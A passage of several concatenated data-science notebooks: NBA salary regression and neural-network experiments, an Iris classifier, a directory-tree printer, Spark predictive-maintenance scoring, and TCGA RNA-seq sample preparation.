regressor_c = LinearRegression()
regressor_c.fit(X_train, y_train)
# + hidden=true
## Predicting the Test set results
y_pred = regressor_c.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# + hidden=true
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# + hidden=true
x_test_yil
# + hidden=true
# Prediction_result2 = ('Predicted Stock Index Price: ', regressor_c.predict(X))
regressor_c_result2 = regressor_c.predict(X)
regressor_c_result3 = regressor_c.predict(x_test_yil)
# + hidden=true
# Add salary prediction to SALARY_PREDICTIONS (SAL_PRED) column
# YIL DEFAULT
position_c['SAL_PRED'] = regressor_c_result2
position_c['SAL_PRED'] = round(position_c['SAL_PRED'], 0)
position_c['SAL_RISIDUAL'] = round(position_c['SAL_PRED']/position_c['INFLATION'], 2)
# YIL = 5
position_c_5 = position_c.copy()
position_c_5['SAL_PRED'] = regressor_c_result3
position_c_5['SAL_PRED'] = round(position_c_5['SAL_PRED'], 0)
position_c_5['SAL_RISIDUAL'] = round(position_c_5['SAL_PRED']/position_c_5['INFLATION'], 2)
# + [markdown] heading_collapsed=true hidden=true
# #### Analysis on POSITION C
# + hidden=true
position_c[position_c['INFLATION'] > 2].sort_values(by='SAL_RISIDUAL', ascending=False)
position_c_5[(position_c_5['INFLATION'] > 2)&(position_c_5['YEAR'] > 2000)].sort_values(by=['PER','SAL_RISIDUAL'], ascending=False)
# + hidden=true
# One player search
# position_c_5[position_c_5['PLAYER_NAME'] == '<NAME>'].sort_values(by='YEAR')
# + hidden=true
# model.evaluate()
# + [markdown] heading_collapsed=true
# ### position_sg
# + hidden=true
default_rank.columns
# + hidden=true
position_sg.columns
# + hidden=true
position_sg = position_sg[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'SEASON_ID', 'YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG3M',
'AST', 'PTS', 'MIN_PRED', 'PER', 'ALLSTAR', 'INJURY_PY',
'INFLATION']]
### Position SG
dataset_sg = position_sg.dropna(thresh=3)
# 5 YIL projection on players without 5 years in the league
dataset_test_yil = position_sg.dropna(thresh=3).copy()
dataset_test_yil.iloc[:, 6] = 5
x_test_yil = dataset_test_yil.iloc[:, 5:-1].values
## Multiple Linear Regressions
X = dataset_sg.iloc[:, 5:-1].values
y = dataset_sg.iloc[:, -1].values
# + hidden=true
## Check correlation to features
train_data = dataset_sg.iloc[:, 4:]
# train_data['INFLATION'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# + hidden=true
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 20)
# + hidden=true
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor_sg = LinearRegression()
regressor_sg.fit(X_train, y_train)
# + hidden=true
## Predicting the Test set results
y_pred = regressor_sg.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# + hidden=true
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# + hidden=true
# Prediction_result2 = ('Predicted Stock Index Price: ', regressor_c.predict(X))
regressor_sg_result2 = regressor_sg.predict(X)
regressor_sg_result3 = regressor_sg.predict(x_test_yil)
# + hidden=true
# Add salary prediction to SALARY_PREDICTIONS (SAL_PRED) column
# YIL DEFAULT
position_sg['SAL_PRED'] = regressor_sg_result2
position_sg['SAL_PRED'] = round(position_sg['SAL_PRED'], 0)
position_sg['SAL_RISIDUAL'] = round(position_sg['SAL_PRED']/position_sg['INFLATION'], 2)
# YIL = 5
position_sg_5 = position_sg.copy()
position_sg_5['SAL_PRED'] = regressor_sg_result3
position_sg_5['SAL_PRED'] = round(position_sg['SAL_PRED'], 0)
position_sg_5['SAL_RISIDUAL'] = round(position_sg['SAL_PRED']/position_sg['INFLATION'], 2)
# + [markdown] hidden=true
# #### Analysis on POSITION SG
# + hidden=true
position_sg[(position_sg['INFLATION'] > 2)&(position_sg_5['YEAR'] > 2000)].sort_values(by='SAL_RISIDUAL', ascending=False)
position_sg_5[(position_sg_5['INFLATION'] > 2)&(position_sg_5['YEAR'] > 2000)].sort_values(by=['PER','SAL_RISIDUAL'], ascending=False)
# + hidden=true
# + hidden=true
# -
# ### All
position_all
# +
# dataset = position name
dataset2 = position_all.dropna(thresh=3)
# 5 YIL projection on players without 5 years in the league
dataset_test_yil = position_all.dropna(thresh=3).copy()
dataset_test_yil = dataset_test_yil[(dataset_test_yil['YEAR'] > 2019) & (dataset_test_yil['YIL'] <= 3)& (dataset_test_yil['INFLATION'] > 3)]
dataset_test_yil.iloc[:, 7] = 5
x_test_yil = dataset_test_yil.iloc[:, 5:-1].values
## Multiple Linear Regressions
X = dataset2.iloc[:, 5:-1].values
y = dataset2.iloc[:, -1].values
# +
# dataset_test_yil = dataset_test_yil[(dataset_test_yil['YEAR'] > 2019) & (dataset_test_yil['YIL'] <= 3)& (dataset_test_yil['INFLATION'] > 3)]
# +
# dataset2.iloc[:, 6]
# -
x_test_yil[0][0]
# +
## Check correlation to features
train_data = dataset2.iloc[:, 4:]
# train_data['INFLATION'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# -
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.10, random_state = 2)
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor2 = LinearRegression()
regressor2.fit(X_train, y_train)
## Predicting the Test set results
y_pred = regressor2.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# ##### SG: ~40%
# Prediction_result2 = ('Predicted Stock Index Price: ', regressor2.predict(X))
Prediction_result2 = regressor2.predict(X)
Prediction_result3 = regressor2.predict(x_test_yil)
# +
# Add salary prediction to SALARY_PREDICTIONS (SAL_PRED) column
dataset2['SAL_PRED'] = Prediction_result2
dataset2['SAL_PRED'] = round(dataset2['SAL_PRED'], 0)
dataset2['SAL_RISIDUAL'] = round(dataset2['SAL_PRED']/dataset2['INFLATION'], 2)
dataset3 = dataset_test_yil.copy()
dataset3['SAL_PRED'] = Prediction_result3
# *1.2 = annual increase not factored into salary before.
# Use this info to create a min salary difference column to help with regression
dataset3['SAL_PRED'] = round(dataset3['SAL_PRED'], 0)
dataset3['SAL_RISIDUAL'] = round(dataset3['SAL_PRED']/dataset3['INFLATION'], 2)
# dataset3['SAL_PRED'] = (dataset3['SAL_PRED']*1.19)
# +
## Save 2020_yil_3_per_only.json
all_data_saved=dataset2.to_csv('../../datasets/all_data_saved_clean.csv', index=False)
# (orient='split')
# SAVE: Player_position
# with open(f'../../datasets/all_data_saved_clean.csv', 'w') as fp:
# json.dump(all_data_saved, fp)
# -
# ## NEED
#
# Possibly create a year 3, 4,5,6 contract for first 5 years.
# Will eventually do the same for 10 year.
# ### YIL = dataset default
# 2020 Season. 3 Years in the league. Sorted by Predicted Salary then PER.
# ds2 = dataset2[(dataset2['SEASON_ID'] == '2019-20') & (dataset2['YIL'] <= 3)].sort_values(by=['PER','YIL'], ascending=False)
ds2 = dataset2[(dataset2['YEAR'] > 2019) & (dataset2['YIL'] <= 3)& (dataset2['INFLATION'] > 3)].sort_values(by=['SAL_PRED','PER'], ascending=False)
_2020_yil_3_per_only_save = ds2.head(10)
_2020_yil_3_per_only_save
# +
## Save 2020_yil_3_per_only.json
_2020_yil_3_per_only_save=_2020_yil_3_per_only_save.to_json(orient='records')
# SAVE: Player_position
with open(f'../../datasets/_2020_yil_3_per_only_save.json', 'w') as fp:
json.dump(_2020_yil_3_per_only_save, fp)
# -
top_2020_yil_3 = ds2[['POSITION', 'PLAYER_NAME', 'YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'MIN_PRED', 'PER', 'INJURY_PY',
'INFLATION', 'SAL_PRED', 'SAL_RISIDUAL']]
top_2020_yil_3.sort_values(by=['SAL_PRED','PER', 'SAL_RISIDUAL'], ascending=False).head(10)
# ### Same but all players in 20 years
ds2_all = dataset2[(dataset2['YIL'] <= 3)& (dataset2['INFLATION'] > 3)].sort_values(by=["YIL","PER"], ascending=False)
_2020_yil_all_per_save = ds2_all.head(10)
# +
## Save 2020_yil_3_per_only.json
_2020_yil_all_per_save=_2020_yil_all_per_save.to_json(orient='records')
# SAVE: Player_position
with open(f'../../datasets/_2020_yil_all_per_save.json', 'w') as fp:
json.dump(_2020_yil_all_per_save, fp)
# +
# ds2 = ds2.set_index("PLAYER_NAME")
# ds2[ds2['PLAYER_ID'] == 1629029]
# -
ds2[ds2['PLAYER_NAME'] == '<NAME>']
# +
#######
## Top 20
# ds2.head(20)
# -
type(dataset3['YIL'][0])
# ### YIL = 5
# ds3 = dataset3[(dataset3['YEAR'] > 2019) & (dataset3['INFLATION'] > 3) ]
ds3 = dataset3[dataset3['INFLATION'] > 3]
# +
# ds3 = dataset3[(dataset3['YEAR'] > 2019) & (dataset3['YIL'] <= 3)& (dataset3['INFLATION'] > 3)].sort_values(by=['PER','YIL'], ascending=False)
# ds3
# -
top_2020_yil_5 = ds3[['POSITION', 'PLAYER_NAME', 'PHOTO','YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'MIN_PRED', 'PER', 'INJURY_PY',
'INFLATION', 'SAL_PRED', 'SAL_RISIDUAL']].reset_index(drop=True)
top_2020_yil_5
# +
# ## Save top_2020_yil_5.json
# top_2020_yil_5_save=top_2020_yil_5.to_json(orient='records')
# # SAVE: Player_position
# with open(f'../../datasets/top_2020_yil_5.json', 'w') as fp:
# json.dump(top_2020_yil_5_save, fp)
# -
# # RUN HERE
# -------------
# + [markdown] heading_collapsed=true
# ## Linear Regression
# + hidden=true
# Assign the data to X and y
X = twenty_years_all_players[["MIN", "GP"]]
y = twenty_years_all_players["PPGP"].values.reshape(-1, 1)
print(X.shape, y.shape)
# + hidden=true
# Use train_test_split to create training and testing data
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# Create the model using LinearRegression
from sklearn.linear_model import LinearRegression
model = LinearRegression()
# + hidden=true
# Fit the model to the training data and calculate the scores for the training and testing data
model.fit(X_train, y_train)
training_score = model.score(X_train, y_train)
testing_score = model.score(X_test, y_test)
print(f"Training Score: {training_score}")
print(f"Testing Score: {testing_score}")
# + hidden=true
# Plot the Residuals for the Training and Testing data
# Use `model.predict()` to get a prediction array from X_train and X_test
y_train_prediction = model.predict(X_train)
y_test_prediction = model.predict(X_test)
# Plot the residual
plt.scatter(y_train_prediction, y_train_prediction - y_train, c="blue", label="Training Data (Points)")
plt.scatter(y_test_prediction, y_test_prediction - y_test, c="orange", label="Testing Data (MIN, GP)")
plt.legend()
plt.hlines(y=0, xmin=y.min(), xmax=y.max())
plt.title("Residual Plot")
# + hidden=true
# + [markdown] hidden=true
# --------------------------
# + [markdown] heading_collapsed=true
# ## Logistic Regression
# * Assiging 'dummies'.
# Creating columns for logistic regression out of categorical data in specific columns. ex: positon of player
# + hidden=true
# twenty_years_all_players
# + hidden=true
ml_test = twenty_years_all_players.drop(columns=['PLAYER_NAME','TEAM_ABBREVIATION','SEASON_ID'])
# + hidden=true
ml_test2 = pd.get_dummies(ml_test)
ml_test2.columns = ml_test2.columns.str.replace(' ','')
ml_test2.head()
# + [markdown] hidden=true
# OREB: Offensive Rebounds
# DREB: Defensive Rebounds
# REB: Rebounds
# AST: Assists
# TOV: Turnovers
# STL: Steals
# BLK: Blocks
# + hidden=true
X = ml_test2[["MIN", "GP"]]
# Select the 'FEV' column for y, and then use values.reshape() to reshape it to a 2d array
y = ml_test2["POSITION_C"].values.reshape(-1, 1)
# + hidden=true
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1, test_size=0.33,)
# + hidden=true
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression()
classifier
# + hidden=true
classifier.fit(X_train, y_train)
# + hidden=true
print(f"Training Data Score: {classifier.score(X_train, y_train)}")
print(f"Testing Data Score: {classifier.score(X_test, y_test)}")
# + hidden=true
# + hidden=true
# Generate a new data point (the red circle)
import numpy as np
new_data = np.array([[800, 36]])
plt.scatter(X.iloc[:, 0], X.iloc[:, 1], c=y)
plt.scatter(new_data[0, 0], new_data[0, 1], c="r", marker="o", s=100)
# + hidden=true
# Predict the class (purple or yellow) of the new data point
predictions = classifier.predict(new_data)
print("Classes are either 0 (purple) or 1 (yellow)")
print(f"The new point was classified as: {predictions}")
# + hidden=true
# + hidden=true
predictions = classifier.predict(X_test)
pd.DataFrame({"Prediction": predictions, "Actual": y_test})
# + [markdown] hidden=true
# ----------
# + [markdown] heading_collapsed=true
# ## TEST: DNN for regression
# https://towardsdatascience.com/deep-neural-networks-for-regression-problems-81321897ca33
# + hidden=true
X = ml_test2[["MIN", "GP"]]
# Select the 'FEV' column for y, and then use values.reshape() to reshape it to a 2d array
y = ml_test2["POSITION_C"].values.reshape(-1, 1)
# + hidden=true
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=101, test_size=0.33)
# + hidden=true
# + hidden=true
def get_cols_with_no_nans(df,col_type):
'''
Arguments :
df : The dataframe to process
col_type :
num : to only get numerical columns with no nans
no_num : to only get nun-numerical columns with no nans
all : to get any columns with no nans
'''
if (col_type == 'num'):
predictors = df.select_dtypes(exclude=['object'])
elif (col_type == 'no_num'):
predictors = df.select_dtypes(include=['object'])
elif (col_type == 'all'):
predictors = df
else :
print('Error : choose a type (num, no_num, all)')
return 0
cols_with_no_nans = []
for col in predictors.columns:
if not df[col].isnull().any():
cols_with_no_nans.append(col)
return cols_with_no_nans
# + hidden=true
# define a function to get the columns that don’t have any missing values
num_cols = get_cols_with_no_nans(ml_test2 , 'num')
cat_cols = get_cols_with_no_nans(ml_test2 , 'no_num')
# + hidden=true
print ('Number of numerical columns with no nan values :',len(num_cols))
print ('Number of nun-numerical columns with no nan values :',len(cat_cols))
# + hidden=true
combined = ml_test2[num_cols + cat_cols]
combined.hist(figsize = (12,10))
plt.show()
# + hidden=true
import seaborn as sb
# + hidden=true
train_data = combined[num_cols + cat_cols]
train_data['POSITION_C'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# + hidden=true
def oneHotEncode(df,colNames):
for col in colNames:
if( df[col].dtype == np.dtype('object')):
dummies = pd.get_dummies(df[col],prefix=col)
df = pd.concat([df,dummies],axis=1)
#drop the encoded column
df.drop([col],axis = 1 , inplace=True)
return df
print('There were {} columns before encoding categorical features'.format(combined.shape[1]))
combined = oneHotEncode(combined, cat_cols)
print('There are {} columns after encoding categorical features'.format(combined.shape[1]))
# + hidden=true
def split_combined():
global combined
train = combined[:1460]
test = combined[1460:]
return train , test
train, test = split_combined()
# + [markdown] hidden=true
# -----------
# + [markdown] heading_collapsed=true
# ## TEST: DNN.
# Sequential model, dense layers, relu as activation function for hidden layers, normal initializer as kernel_initializer. Mean absolute error as loss function. Linear as activation function for output
# + hidden=true
# first, create a normal neural network with 2 inputs, 6 hidden nodes, and 2 outputs
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.utils import to_categorical
# + hidden=true
from sklearn.preprocessing import StandardScaler
# Create a StandardScater model and fit it to the training data
X_scaler = StandardScaler().fit(X_train)
# + hidden=true
# Transform the training and testing data using the X_scaler
X_train_scaled = X_scaler.transform(X_train)
X_test_scaled = X_scaler.transform(X_test)
# + hidden=true
# One-hot encoding
y_train_categorical = to_categorical(y_train)
y_test_categorical = to_categorical(y_test)
# + hidden=true
# first, create a normal neural network with 2 inputs, 6 hidden nodes, and 2 outputs
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
import tensorflow as tf
model = Sequential()
model.add(Dense(units=6, activation='relu', input_dim=2, name='hidden'))
model.add(Dense(units=2, activation='softmax', name='output'))
# + hidden=true
model.summary()
# + hidden=true
# Compile the model
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
# + hidden=true
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
session = tf.compat.v1.Session(config=config)
# + hidden=true
# Fit the model to the training data
model.fit(
X_train_scaled,
y_train_categorical,
validation_data=(X_test_scaled, y_test_categorical),
epochs=60,
shuffle=True,
verbose=2
)
# + hidden=true
# + [markdown] heading_collapsed=true hidden=true
# ### TEST: Deep Learning
# + hidden=true
deep_model = Sequential(name='deep_model')
deep_model.add(Dense(units=6, activation='relu', input_dim=2, name='hidden'))
deep_model.add(Dense(units=6, activation='relu', name='hidden_2'))
deep_model.add(Dense(units=2, activation='softmax', name='output'))
# + hidden=true
deep_model.summary()
# + hidden=true
# deep_model.compile(optimizer='adam',
# loss='categorical_crossentropy',
# metrics=['accuracy'])
# deep_model.compile(optimizer='adam',
# loss='mean_absolute_error',
# metrics=['mean_absolute_error'])
# deep_model.fit(
# X_train_scaled,
# y_train_categorical,
# validation_data=(X_test_scaled, y_test_categorical),
# epochs=100,
# shuffle=True,
# verbose=2
# )
# + hidden=true
deep_model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
deep_model.fit(
X_train_scaled,
y_train_categorical,
validation_data=(X_test_scaled, y_test_categorical),
epochs=100,
shuffle=True,
verbose=2
)
# + [markdown] heading_collapsed=true hidden=true
# ### Compare the models below
# + hidden=true
model_loss, model_accuracy = model.evaluate(
X_test_scaled, y_test_categorical, verbose=2)
print(
f"Normal Neural Network - Loss: {model_loss}, Accuracy: {model_accuracy}")
# + hidden=true
model_loss, model_accuracy = deep_model.evaluate(
X_test_scaled, y_test_categorical, verbose=2)
print(f"Deep Neural Network - Loss: {model_loss}, Accuracy: {model_accuracy}")
# + hidden=true
# + [markdown] hidden=true
# -----------------
# + hidden=true
import tensorflow.keras as keras
# + hidden=true
checkpoint_name = 'Weights-{epoch:03d}--{val_loss:.5f}.hdf5'
checkpoint = ModelCheckpoint(checkpoint_name, monitor='val_loss', verbose = 1, save_best_only = True, mode ='auto')
callbacks_list = [checkpoint]
# + hidden=true
# + hidden=true
# + hidden=true
# + hidden=true
# + [markdown] hidden=true
# --------
# + hidden=true
# Ridge model
# Note: Use an alpha of .01 when creating the model for this activity
from sklearn.linear_model import Ridge
### BEGIN SOLUTION
ridge = Ridge(alpha=.01)
ridge.fit(X_train_scaled, y_train_scaled)
predictions = ridge.predict(X_test_scaled)
MSE = mean_squared_error(y_test_scaled, predictions)
r2 = ridge.score(X_test_scaled, y_test_scaled)
### END SOLUTION
print(f"MSE: {MSE}, R2: {r2}")
# + hidden=true
# ElasticNet model
# Note: Use an alpha of .01 when creating the model for this activity
from sklearn.linear_model import ElasticNet
### BEGIN SOLUTION
elasticnet = ElasticNet(alpha=.01)
elasticnet.fit(X_train_scaled, y_train_scaled)
predictions = elasticnet.predict(X_test_scaled)
MSE = mean_squared_error(y_test_scaled, predictions)
r2 = elasticnet.score(X_test_scaled, y_test_scaled)
### END SOLUTION
print(f"MSE: {MSE}, R2: {r2}")
# + [markdown] hidden=true
# ---------------
|
group_files/cpompa/notebooks/4-nba-ml-multi-linear-regression.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Trains a simple deep NN on the IRIS dataset.
#
#
import tensorflow as tf
import numpy as np
from tensorflow.python import keras
from tensorflow.python.keras.datasets import mnist
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Dense, Dropout
from tensorflow.python.keras.optimizers import RMSprop
batch_size = 50
num_classes = 3
epochs = 200
# +
import pandas as pd
iris=pd.read_csv("./iris_data/iris.csv")
# Shuffling
iriss=iris.sample(frac=1).reset_index(drop=True)
iris_train=iriss.iloc[0:100,:]
iris_test=iriss.iloc[100:150,:]
x_train=iris_train.iloc[:,0:4].values
x_test=iris_test.iloc[:,0:4].values
y_train=iris_train.iloc[:,4:5]
y_test=iris_test.iloc[:,4:5]
# encoder={k:v for v,k in enumerate(y_train.drop_duplicates())}
# encoder
sets=iris.iloc[:,4:5].drop_duplicates()["Species"].tolist()
encoder={k:v for v,k in enumerate(sets)}
y_train=[ encoder[i] for i in y_train["Species"].tolist() ]
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test=[ encoder[i] for i in y_test["Species"].tolist() ]
y_test = keras.utils.to_categorical(y_test, num_classes)
# -
# 데이터 shape 을 확인해 봅니다.
print(x_train.shape,y_train.shape,x_test.shape,y_test.shape)
# +
model = Sequential()
model.add(Dense(30, activation='relu', input_shape=(4,)))
model.add(Dropout(0.2))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
# -
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
|
6.KerasBasic/MLP_iris/MLP_iris.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import os
# +
from pathlib import Path
class DisplayablePath(object):
display_filename_prefix_middle = '├──'
display_filename_prefix_last = '└──'
display_parent_prefix_middle = ' '
display_parent_prefix_last = '│ '
def __init__(self, path, parent_path, is_last):
self.path = Path(str(path))
self.parent = parent_path
self.is_last = is_last
if self.parent:
self.depth = self.parent.depth + 1
else:
self.depth = 0
@property
def displayname(self):
if self.path.is_dir():
return self.path.name + '/'
return self.path.name
@classmethod
def make_tree(cls, root, parent=None, is_last=False, criteria=None):
root = Path(str(root))
criteria = criteria or cls._default_criteria
displayable_root = cls(root, parent, is_last)
yield displayable_root
children = sorted(list(path
for path in root.iterdir()
if criteria(path)),
key=lambda s: str(s).lower())
count = 1
for path in children:
is_last = count == len(children)
if path.is_dir():
yield from cls.make_tree(path,
parent=displayable_root,
is_last=is_last,
criteria=criteria)
else:
yield cls(path, displayable_root, is_last)
count += 1
@classmethod
def _default_criteria(cls, path):
return True
@property
def displayname(self):
if self.path.is_dir():
return self.path.name + '/'
return self.path.name
def displayable(self):
if self.parent is None:
return self.displayname
_filename_prefix = (self.display_filename_prefix_last
if self.is_last
else self.display_filename_prefix_middle)
parts = ['{!s} {!s}'.format(_filename_prefix,
self.displayname)]
parent = self.parent
while parent and parent.parent is not None:
parts.append(self.display_parent_prefix_middle
if parent.is_last
else self.display_parent_prefix_last)
parent = parent.parent
return ''.join(reversed(parts))
# -
p = os.getcwd()
ignore = ['data-processed', 'dataset', 'Kaggle-RecSys-101', 'dataset-original']
paths = DisplayablePath.make_tree(
Path(p),
criteria=lambda path: True if path.name not in (ignore) else False)
for path in paths:
print(path.displayable())
|
make-project-tree.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PredictiveMaintenance dlvmjme
# language: python
# name: predictivemaintenance_dlvmjme
# ---
# # Step 3B: Model Scoring evaluation
#
# Using the results data set constructed in the `3b_model_scoring` Jupyter notebook, this notebook loads the data scores the observations.
#
# **Note:** This notebook will take about 1 minutes to execute all cells, depending on the compute configuration you have setup.
# +
# import the libraries
# For some data handling
import numpy as np
from pyspark.ml import PipelineModel
# for creating pipelines and model
from pyspark.ml.feature import StringIndexer, VectorAssembler, VectorIndexer
# The scoring uses the same feature engineering script used to train the model
results_table = 'results_output'
# -
dbutils.widgets.removeAll()
dbutils.widgets.text("results_data", results_table)
# +
# make predictions. The Pipeline does all the same operations on the test data
sqlContext.refreshTable(dbutils.widgets.get("results_data"))
predictions = spark.table(dbutils.widgets.get("results_data"))
# Create the confusion matrix for the multiclass prediction results
# This result assumes a decision boundary of p = 0.5
conf_table = predictions.stat.crosstab('indexedLabel', 'prediction')
confuse = conf_table.toPandas()
confuse.head()
# -
# The confusion matrix lists each true component failure in rows and the predicted value in columns. Labels numbered 0.0 corresponds to no component failures. Labels numbered 1.0 through 4.0 correspond to failures in one of the four components in the machine. As an example, the third number in the top row indicates how many days we predicted component 2 would fail, when no components actually did fail. The second number in the second row, indicates how many days we correctly predicted a component 1 failure within the next 7 days.
#
# We read the confusion matrix numbers along the diagonal as correctly classifying the component failures. Numbers above the diagonal indicate the model incorrectly predicting a failure when non occured, and those below indicate incorrectly predicting a non-failure for the row indicated component failure.
#
# When evaluating classification models, it is convenient to reduce the results in the confusion matrix into a single performance statistic. However, depending on the problem space, it is impossible to always use the same statistic in this evaluation. Below, we calculate four such statistics.
#
# - **Accuracy**: reports how often we correctly predicted the labeled data. Unfortunatly, when there is a class imbalance (a large number of one of the labels relative to others), this measure is biased towards the largest class. In this case non-failure days.
#
# Because of the class imbalance inherint in predictive maintenance problems, it is better to look at the remaining statistics instead. Here positive predictions indicate a failure.
#
# - **Precision**: Precision is a measure of how well the model classifies the truely positive samples. Precision depends on falsely classifying negative days as positive.
#
# - **Recall**: Recall is a measure of how well the model can find the positive samples. Recall depends on falsely classifying positive days as negative.
#
# - **F1**: F1 considers both the precision and the recall. F1 score is the harmonic average of precision and recall. An F1 score reaches its best value at 1 (perfect precision and recall) and worst at 0.
#
# These metrics make the most sense for binary classifiers, though they are still useful for comparision in our multiclass setting. Below we calculate these evaluation statistics for the selected classifier, and post them back to the AML workbench run time page for tracking between experiments.
# +
# select (prediction, true label) and compute test error
# select (prediction, true label) and compute test error
# True positives - diagonal failure terms
tp = confuse['1.0'][1]+confuse['2.0'][2]+confuse['3.0'][3]+confuse['4.0'][4]
# False positves - All failure terms - True positives
fp = np.sum(np.sum(confuse[['1.0', '2.0','3.0','4.0']])) - tp
# True negatives
tn = confuse['0.0'][0]
# False negatives total of non-failure column - TN
fn = np.sum(np.sum(confuse[['0.0']])) - tn
# Accuracy is diagonal/total
acc_n = tn + tp
acc_d = np.sum(np.sum(confuse[['0.0','1.0', '2.0','3.0','4.0']]))
acc = acc_n/acc_d
# Calculate precision and recall.
prec = tp/(tp+fp)
rec = tp/(tp+fn)
# Print the evaluation metrics to the notebook
print("Accuracy = %g" % acc)
print("Precision = %g" % prec)
print("Recall = %g" % rec )
print("F1 = %g" % (2.0 * prec * rec/(prec + rec)))
print("")
# -
# Remember that this is a simulated data set. We would expect a model built on real world data to behave very differently. The accuracy may still be close to one, but the precision and recall numbers would be much lower.
predictions.toPandas().head(20)
print(predictions.summary())
predictions.explain()
# # Conclusion
#
# This concludes this scenario. You can modify these notebooks to customize your own use case solution.
|
notebooks/3b_model_scoring_evaluation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: torch
# language: python
# name: torch
# ---
# +
import numpy as np
import pandas as pd
np.random.seed(123)
# viz
import matplotlib.pyplot as plt
# notebook settings
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
pd.set_option('display.max_columns', 1000)
# -
# ## Sample Prep
samples = pd.read_csv('../data/TCGA/rna-seq_pan/meta/gdc_sample_sheet.2019-12-12.tsv', sep="\t")
# get file type
samples['data'] = [val[1] for i,val in samples['File Name'].str.split(".").items()]
samples.head()
# Samples with RNAseq adjacent normal tissue
samples[samples['Sample Type']=='Solid Tissue Normal']['data'].value_counts()
samples['project'] = [val[1] for i,val in samples['Project ID'].str.split("-").items()]
samples['project'].value_counts()
# all cases with adjacent normal tissue
cases = samples[samples['Sample Type']=='Solid Tissue Normal']['Case ID']
# disparity in cases
samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Primary Tumor')
& (samples['data']=='FPKM') & (samples['project']=='BRCA')]['Case ID'].nunique()
samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Solid Tissue Normal')
& (samples['data']=='FPKM') & (samples['project']=='BRCA')]['Case ID'].nunique()
# divide, join, subset
case_tumor = samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Primary Tumor') &
(samples['data']=='FPKM') & (samples['project']=='BRCA')]
case_norm = samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Solid Tissue Normal') &
(samples['data']=='FPKM') & (samples['project']=='BRCA')]
#cases = case_norm[case_norm['Case ID'].isin(case_tumor['Case ID'])]['Case ID']
cases = pd.merge(case_tumor['Case ID'], case_norm['Case ID'])['Case ID']
cases.shape
case_tumor = case_tumor[case_tumor['Case ID'].isin(cases)]
case_norm = case_norm[case_norm['Case ID'].isin(cases)]
cases = pd.concat([case_tumor, case_norm])
case_tumor.shape
case_norm.shape
cases.shape
# ## Dataset Prep
# +
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
target = 'Sample Type'
cases[target] = cases[target].astype('category')
train, test = train_test_split(cases)
train[target].value_counts()
test[target].value_counts()
# +
import torch
from torch.optim import lr_scheduler
import torch.optim as optim
from torch.autograd import Variable
torch.manual_seed(123)
from trainer import fit
import visualization as vis
import numpy as np
